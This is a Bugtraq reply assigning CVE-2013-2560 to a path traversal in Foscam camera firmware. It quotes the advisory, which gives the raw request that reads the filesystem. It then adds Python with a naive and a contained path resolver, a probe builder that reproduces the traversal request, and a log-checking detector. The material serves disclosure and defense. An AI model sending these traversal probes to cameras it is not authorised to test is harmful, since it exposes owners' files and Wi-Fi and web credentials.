Re: [CVE-REQUEST] Foscam <= 11.37.2.48 path traversal vulnerability

From: Frédéric BASSE <basse.frederic@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Re: [CVE-REQUEST] Foscam <= 11.37.2.48 path traversal vulnerability
Date:


CVE Assigned: CVE-2013-2560.

2013/3/2 Frédéric BASSE <basse.frederic@gmail.com>:
> [CVE-REQUEST] Foscam <= 11.37.2.48 path traversal vulnerability
> _______________________________________________________________________
> Summary:
> Foscam firmware <= 11.37.2.48 is prone to a path traversal
> vulnerability in the embedded web interface.
>
> An unauthenticated attacker can access the entire filesystem and
> steal web & wifi credentials.
> _______________________________________________________________________
> Details:
>
> GET //../proc/kcore HTTP/1.0
>
>
> ____________________________________________________________________
> CVSS Version 2 Metrics:
> Access Vector: Network exploitable
> Access Complexity: Low
> Authentication: Not required to exploit
> Confidentiality Impact: Complete
> Availability Impact: Complete
> _______________________________________________________________________
> Disclosure Timeline:
> 2013-01-18 Vendor fixed the issue in fw 11.37.2.49; no security notice
> 2013-02-21 Vulnerability found
> 2013-03-01 Public advisory
> _______________________________________________________________________
> Solution:
> A new firmware is available on vendor's site:
> http://www.foscam.com/down3.aspx
> _______________________________________________________________________
> References:
> http://code.google.com/p/bflt-utils/
> http://wiki.openipcam.com/
> _______________________________________________________________________
> Arnaud Calmejane - Frederic Basse
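The request in the advisory, `GET //../proc/kcore HTTP/1.0`, works because the camera's web server maps the URL path onto the filesystem without checking that the result stays inside the document root. The following Python is an added illustration and is not code from the advisory authors or from Foscam firmware: it contrasts a naive concatenation-style resolver with a contained one, builds the raw probe line from the advisory for a detection check, and classifies request paths for log review. The web root `/www`, the host address, and the sample request paths are assumptions made for the example; the advisory does not state why the leading `//` specifically matters on the real firmware, so the naive resolver here simply models unchecked path joining.

```python
"""Path traversal in an embedded web server: naive vs. contained path resolution.

Added illustration, not Foscam's code.  WEB_ROOT, the host address and the
sample request paths are constructed for the example; the probe line
"GET //../proc/kcore HTTP/1.0" is the one from the advisory.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/www"  # assumed document root of the camera's web UI (illustrative)


def naive_resolve(web_root: str, request_path: str) -> str:
    """Resolve the way an unchecked embedded server does: concatenate the root
    and the request path and let '..' components collapse.  A leading '//../'
    walks straight out of the web root."""
    return posixpath.normpath(web_root + request_path)


def safe_resolve(web_root: str, request_path: str):
    """Percent-decode, normalise, then require the result to stay inside
    web_root.  Returns the filesystem path, or None if the request escapes."""
    decoded = unquote(request_path)               # catches %2e%2e encodings too
    root = posixpath.normpath(web_root)
    # Strip leading slashes so posixpath.join cannot treat the request as absolute.
    relative = decoded.lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def build_probe(host: str, target: str = "/proc/kcore") -> bytes:
    """Build the raw HTTP/1.0 probe from the advisory for a vulnerability check.
    'target' is the absolute filesystem path to read; the leading '//../' is
    what escapes the document root on the vulnerable firmware."""
    return (f"GET //..{target} HTTP/1.0\r\n"
            f"Host: {host}\r\n\r\n").encode()


def is_traversal(request_path: str) -> bool:
    """Log-review / reverse-proxy check: does this request path escape the
    assumed web root once decoded and normalised?"""
    return safe_resolve(WEB_ROOT, request_path) is None


if __name__ == "__main__":
    # Constructed sample of request paths as they might appear in an access log.
    for path in ["/index.htm", "//../proc/kcore", "/%2e%2e/etc/passwd", "/js/../index.htm"]:
        print(f"{path:24} naive -> {naive_resolve(WEB_ROOT, path):18} "
              f"safe -> {safe_resolve(WEB_ROOT, path)}  traversal={is_traversal(path)}")
    print(build_probe("192.0.2.10"))
```

The probe builder is meant for a scanner that connects to the camera and checks whether the response body looks like file contents rather than the web UI; `safe_resolve` is the containment check a fixed server (or a proxy in front of an unpatched one) should apply before opening any file.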
